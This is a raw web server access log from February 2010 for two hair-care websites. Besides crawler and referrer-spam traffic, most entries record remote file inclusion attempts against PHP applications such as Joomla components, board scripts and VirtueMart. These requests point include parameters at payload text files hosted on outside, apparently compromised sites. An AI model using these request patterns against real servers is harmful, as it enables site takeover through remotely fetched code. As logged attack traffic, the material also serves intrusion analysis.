189.89.20.27 - - [28/Feb/2010:16:12:32 -0800] "GET /logs/access.log/ HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
189.89.20.27 - - [28/Feb/2010:16:12:33 -0800] "GET / HTTP/1.1" 200 926 "-" "Mozilla/5.0" "www.freehairsecrets.com"
189.89.20.27 - - [28/Feb/2010:16:12:33 -0800] "GET /logs/ HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.freehairsecrets.com"
219.240.39.222 - - [28/Feb/2010:16:14:38 -0800] "GET /logs/access_100125.log/delete_all.php?board_skin_path=http://trouvaillecosmeticos.com.br/components/com_migrator/vsh/index1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
219.240.39.222 - - [28/Feb/2010:16:14:38 -0800] "GET /delete_all.php?board_skin_path=http://trouvaillecosmeticos.com.br/components/com_migrator/vsh/index1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
219.240.39.222 - - [28/Feb/2010:16:14:38 -0800] "GET /logs/delete_all.php?board_skin_path=http://trouvaillecosmeticos.com.br/components/com_migrator/vsh/index1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.129.119.41 - - [28/Feb/2010:16:20:18 -0800] "GET /freehairsecretsphp/viewtopic.php?p=13770 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.freehairsecrets.com"
219.240.39.222 - - [28/Feb/2010:16:20:26 -0800] "GET /delete_all.php?board_skin_path=http://trouvaillecosmeticos.com.br/components/com_migrator/vsh/index1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
219.240.39.222 - - [28/Feb/2010:16:20:26 -0800] "GET /logs/access.log/delete_all.php?board_skin_path=http://trouvaillecosmeticos.com.br/components/com_migrator/vsh/index1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
219.240.39.222 - - [28/Feb/2010:16:20:26 -0800] "GET /logs/delete_all.php?board_skin_path=http://trouvaillecosmeticos.com.br/components/com_migrator/vsh/index1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
194.24.174.51 - - [28/Feb/2010:16:21:11 -0800] "GET /logs/access_091123.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&http://etkbc.org/Images/Ba/id1.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
194.24.174.51 - - [28/Feb/2010:16:21:12 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&http://etkbc.org/Images/Ba/id1.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
194.24.174.51 - - [28/Feb/2010:16:21:12 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&http://etkbc.org/Images/Ba/id1.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
216.129.119.41 - - [28/Feb/2010:16:21:36 -0800] "GET /freehairsecretsphp/viewtopic.php?p=14102 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.freehairsecrets.com"
216.129.119.41 - - [28/Feb/2010:16:24:02 -0800] "GET /freehairsecretsphp/viewtopic.php?p=4630 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.freehairsecrets.com"
216.129.119.41 - - [28/Feb/2010:16:25:11 -0800] "GET /freehairsecretsphp/viewtopic.php?p=3248 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.freehairsecrets.com"
216.129.119.41 - - [28/Feb/2010:16:26:20 -0800] "GET /freehairsecretsphp/viewtopic.php?p=14717 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.freehairsecrets.com"
66.249.65.21 - - [28/Feb/2010:16:26:37 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.freehairsecrets.com"
69.64.70.246 - - [28/Feb/2010:16:30:42 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.64.70.246 - - [28/Feb/2010:16:30:42 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.64.70.246 - - [28/Feb/2010:16:30:42 -0800] "GET /logs/access_100111.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.173.161.146 - - [28/Feb/2010:16:34:47 -0800] "GET /logs/access_100125.log//board/bbs/delete_all.php?board_skin_path=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
200.201.180.130 - - [28/Feb/2010:16:35:35 -0800] "GET /board/bbs/delete_all.php?board_skin_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
200.201.180.130 - - [28/Feb/2010:16:35:35 -0800] "GET /logs/access_100125.log%20%20//board/bbs/delete_all.php?board_skin_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
200.201.180.130 - - [28/Feb/2010:16:35:35 -0800] "GET /logs//board/bbs/delete_all.php?board_skin_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.173.161.146 - - [28/Feb/2010:16:36:13 -0800] "GET /logs/access.log//board/bbs/delete_all.php?board_skin_path=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
216.129.119.41 - - [28/Feb/2010:16:41:12 -0800] "GET /logs/access.log HTTP/1.1" 200 5347 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.freehairsecrets.com"
89.107.104.81 - - [28/Feb/2010:16:49:33 -0800] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Babya Discoverer 8.0:" "growlonghairfast.com"
89.107.104.81 - - [28/Feb/2010:16:49:33 -0800] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Babya Discoverer 8.0:" "growlonghairfast.com"
194.24.174.51 - - [28/Feb/2010:16:57:48 -0800] "GET /logs/access_100111.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&http://etkbc.org/Images/Ba/id1.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
216.129.119.41 - - [28/Feb/2010:17:00:15 -0800] "GET /freehairsecretsphp/viewtopic.php?p=14626 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.freehairsecrets.com"
216.129.119.41 - - [28/Feb/2010:17:01:33 -0800] "GET /freehairsecretsphp/viewtopic.php?p=14346 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.freehairsecrets.com"
212.241.177.123 - - [28/Feb/2010:17:03:50 -0800] "GET /logs/access_100125.log/index.php?option=com_poll&task=results&id=http://region2000.org///images/AinuLid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.241.177.123 - - [28/Feb/2010:17:03:50 -0800] "GET /logs/index.php?option=com_poll&task=results&id=http://region2000.org///images/AinuLid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.241.177.123 - - [28/Feb/2010:17:03:50 -0800] "GET /index.php?option=com_poll&task=results&id=http://region2000.org///images/AinuLid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.173.161.146 - - [28/Feb/2010:17:04:46 -0800] "GET /logs//include/mail.inc.php?skin_board_path=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.173.161.146 - - [28/Feb/2010:17:04:46 -0800] "GET /logs/access_100111.log%20%20//include/mail.inc.php?skin_board_path=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.173.161.146 - - [28/Feb/2010:17:04:46 -0800] "GET /include/mail.inc.php?skin_board_path=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.173.161.146 - - [28/Feb/2010:17:05:18 -0800] "GET /logs/access_100104.log%20%20//include/mail.inc.php?skin_board_path=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
95.215.1.3 - - [28/Feb/2010:17:09:41 -0800] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Update a; AOL 6.0; Windows 98)" "growlonghairfast.com"
95.215.1.3 - - [28/Feb/2010:17:09:41 -0800] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Update a; AOL 6.0; Windows 98)" "growlonghairfast.com"
89.107.104.81 - - [28/Feb/2010:17:13:07 -0800] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://freehairsecrets.com/freehairsecretsphp/index.php" "Opera/7.54 (Windows NT 5.1; U) [pl]" "freehairsecrets.com"
89.107.104.81 - - [28/Feb/2010:17:13:07 -0800] "GET / HTTP/1.0" 200 910 "http://freehairsecrets.com/" "Opera/7.54 (Windows NT 5.1; U) [pl]" "freehairsecrets.com"
119.63.198.122 - - [28/Feb/2010:17:17:42 -0800] "GET /freehairsecretsphp/viewtopic.php?p=16419 HTTP/1.1" 200 349 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "freehairsecrets.com"
91.212.226.210 - - [28/Feb/2010:17:24:25 -0800] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0; .NET CLR 1.0.2914)" "growlonghairfast.com"
91.212.226.210 - - [28/Feb/2010:17:24:26 -0800] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0; .NET CLR 1.0.2914)" "growlonghairfast.com"
213.5.70.66 - - [28/Feb/2010:17:27:30 -0800] "GET /logs/access_091123.log HTTP/1.0" 200 1294739 "http://ppgis2.science.oregonstate.edu/content/online-drugstore" "Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)" "growlonghairfast.com"
62.173.161.146 - - [28/Feb/2010:17:30:44 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.173.161.146 - - [28/Feb/2010:17:30:44 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.173.161.146 - - [28/Feb/2010:17:30:44 -0800] "GET /logs/access_100111.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.224.94.218 - - [28/Feb/2010:17:31:43 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.224.94.218 - - [28/Feb/2010:17:31:43 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.224.94.218 - - [28/Feb/2010:17:31:43 -0800] "GET /logs/access_100111.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.64.70.246 - - [28/Feb/2010:17:31:56 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.64.70.246 - - [28/Feb/2010:17:31:57 -0800] "GET /logs/access_100111.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.64.70.246 - - [28/Feb/2010:17:31:58 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.212.226.210 - - [28/Feb/2010:17:37:11 -0800] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "freehairsecrets.com"
91.212.226.210 - - [28/Feb/2010:17:37:11 -0800] "GET / HTTP/1.0" 200 910 "http://freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "freehairsecrets.com"
95.215.1.3 - - [28/Feb/2010:17:37:36 -0800] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 95; MSIECrawler)" "freehairsecrets.com"
95.215.1.3 - - [28/Feb/2010:17:37:36 -0800] "GET / HTTP/1.0" 200 910 "http://freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 95; MSIECrawler)" "freehairsecrets.com"
69.64.70.246 - - [28/Feb/2010:17:42:09 -0800] "GET /logs/access_100111.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.129.119.41 - - [28/Feb/2010:17:44:52 -0800] "GET /freehairsecretsphp/viewtopic.php?p=18879 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.freehairsecrets.com"
216.129.119.41 - - [28/Feb/2010:17:49:18 -0800] "GET /freehairsecretsphp/viewtopic.php?p=4807 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.freehairsecrets.com"
62.173.161.146 - - [28/Feb/2010:17:50:12 -0800] "GET /logs/access_100111.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.224.94.218 - - [28/Feb/2010:17:53:54 -0800] "GET /logs/access_100111.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
200.93.147.154 - - [28/Feb/2010:17:54:16 -0800] "GET /logs/access.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
200.93.147.154 - - [28/Feb/2010:17:54:16 -0800] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 200 928 "-" "Mozilla/5.0" "www.freehairsecrets.com"
200.93.147.154 - - [28/Feb/2010:17:54:16 -0800] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 200 4950 "-" "Mozilla/5.0" "www.freehairsecrets.com"
219.93.62.74 - - [28/Feb/2010:17:56:06 -0800] "GET /logs/access_100111.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
219.93.62.74 - - [28/Feb/2010:17:56:07 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
219.93.62.74 - - [28/Feb/2010:17:56:07 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
200.93.147.154 - - [28/Feb/2010:17:56:36 -0800] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 200 928 "-" "Mozilla/5.0" "www.freehairsecrets.com"
200.93.147.154 - - [28/Feb/2010:17:56:36 -0800] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 200 4950 "-" "Mozilla/5.0" "www.freehairsecrets.com"
200.93.147.154 - - [28/Feb/2010:17:56:36 -0800] "GET /logs/access.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.225.42.178 - - [28/Feb/2010:17:59:08 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "growlonghairfast.com"
77.225.42.178 - - [28/Feb/2010:17:59:09 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "growlonghairfast.com"
77.225.42.178 - - [28/Feb/2010:17:59:12 -0800] "GET /logs/access_100125.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "growlonghairfast.com"
77.225.42.178 - - [28/Feb/2010:18:00:23 -0800] "GET /logs/access_100118.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "growlonghairfast.com"
200.201.180.130 - - [28/Feb/2010:18:00:53 -0800] "GET /board/bbs/delete_all.php?board_skin_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
200.201.180.130 - - [28/Feb/2010:18:00:53 -0800] "GET /logs//board/bbs/delete_all.php?board_skin_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
200.201.180.130 - - [28/Feb/2010:18:00:53 -0800] "GET /logs/access.log%20%20//board/bbs/delete_all.php?board_skin_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
200.93.147.154 - - [28/Feb/2010:18:01:28 -0800] "GET /logs/access.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
200.93.147.154 - - [28/Feb/2010:18:01:28 -0800] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 200 4950 "-" "Mozilla/5.0" "www.freehairsecrets.com"
200.93.147.154 - - [28/Feb/2010:18:01:29 -0800] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 200 928 "-" "Mozilla/5.0" "www.freehairsecrets.com"
200.93.147.154 - - [28/Feb/2010:18:01:49 -0800] "GET /logs/access.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
200.93.147.154 - - [28/Feb/2010:18:01:52 -0800] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 200 928 "-" "Mozilla/5.0" "www.freehairsecrets.com"
78.110.50.120 - - [28/Feb/2010:18:07:46 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.justice.gov.ge/_cache_img/lc1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.120 - - [28/Feb/2010:18:07:46 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.justice.gov.ge/_cache_img/lc1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.120 - - [28/Feb/2010:18:08:41 -0800] "GET /logs/access_100111.log%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.justice.gov.ge/_cache_img/lc1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.120 - - [28/Feb/2010:18:09:21 -0800] "GET /logs/access_100118.log%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.justice.gov.ge/_cache_img/lc1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.120 - - [28/Feb/2010:18:10:22 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.justice.gov.ge/_cache_img/lc1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.120 - - [28/Feb/2010:18:10:22 -0800] "GET /logs/access_100111.log//tools/send_reminders.php?noSet=0&includedir=http://www.justice.gov.ge/_cache_img/lc1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.120 - - [28/Feb/2010:18:10:22 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.justice.gov.ge/_cache_img/lc1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
75.119.216.146 - - [28/Feb/2010:18:10:59 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.justice.gov.ge/_cache_img/lc1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
75.119.216.146 - - [28/Feb/2010:18:10:59 -0800] "GET /logs/access_100111.log//tools/send_reminders.php?noSet=0&includedir=http://www.justice.gov.ge/_cache_img/lc1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
75.119.216.146 - - [28/Feb/2010:18:10:59 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.justice.gov.ge/_cache_img/lc1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.120 - - [28/Feb/2010:18:11:06 -0800] "GET /logs/access_100118.log//tools/send_reminders.php?noSet=0&includedir=http://www.justice.gov.ge/_cache_img/lc1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
75.119.216.146 - - [28/Feb/2010:18:11:41 -0800] "GET /logs/access_100118.log//tools/send_reminders.php?noSet=0&includedir=http://www.justice.gov.ge/_cache_img/lc1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.120 - - [28/Feb/2010:18:11:50 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.justice.gov.ge/_cache_img/lc1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
78.110.50.120 - - [28/Feb/2010:18:11:50 -0800] "GET /logs/access.log%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.justice.gov.ge/_cache_img/lc1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
78.110.50.120 - - [28/Feb/2010:18:11:50 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.justice.gov.ge/_cache_img/lc1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
78.110.50.120 - - [28/Feb/2010:18:13:43 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.justice.gov.ge/_cache_img/lc1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
78.110.50.120 - - [28/Feb/2010:18:13:43 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.justice.gov.ge/_cache_img/lc1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
78.110.50.120 - - [28/Feb/2010:18:13:43 -0800] "GET /logs/access.log//tools/send_reminders.php?noSet=0&includedir=http://www.justice.gov.ge/_cache_img/lc1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
193.138.158.46 - - [28/Feb/2010:18:14:49 -0800] "GET /logs/access.log%20%20//main.php?sayfa=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
193.138.158.46 - - [28/Feb/2010:18:14:49 -0800] "GET /main.php?sayfa=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
193.138.158.46 - - [28/Feb/2010:18:14:49 -0800] "GET /logs//main.php?sayfa=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
216.129.119.41 - - [28/Feb/2010:18:24:02 -0800] "GET /freehairsecretsphp/viewtopic.php?p=18893 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.freehairsecrets.com"
216.129.119.41 - - [28/Feb/2010:18:25:10 -0800] "GET /freehairsecretsphp/viewtopic.php?p=14939 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.freehairsecrets.com"
193.138.158.46 - - [28/Feb/2010:18:32:24 -0800] "GET /logs/access.log//main.php?sayfa=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
83.103.72.130 - - [28/Feb/2010:18:45:47 -0800] "GET //write_update.php?board_skin_path=http://www.farmwinona.org/jackz/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
83.103.72.130 - - [28/Feb/2010:18:45:47 -0800] "GET /logs///write_update.php?board_skin_path=http://www.farmwinona.org/jackz/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
83.103.72.130 - - [28/Feb/2010:18:45:47 -0800] "GET /logs/access.log%20%20///write_update.php?board_skin_path=http://www.farmwinona.org/jackz/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
216.129.119.41 - - [28/Feb/2010:18:48:50 -0800] "GET /freehairsecretsphp/viewtopic.php?p=5654 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.freehairsecrets.com"
83.103.72.130 - - [28/Feb/2010:18:49:17 -0800] "GET /logs///write_update.php?board_skin_path=http://www.farmwinona.org/jackz/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
83.103.72.130 - - [28/Feb/2010:18:49:17 -0800] "GET /logs/access.log///write_update.php?board_skin_path=http://www.farmwinona.org/jackz/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
83.103.72.130 - - [28/Feb/2010:18:49:20 -0800] "GET //write_update.php?board_skin_path=http://www.farmwinona.org/jackz/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
83.103.72.130 - - [28/Feb/2010:18:51:30 -0800] "GET /logs/access_100125.log///write_update.php?board_skin_path=http://www.farmwinona.org/jackz/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
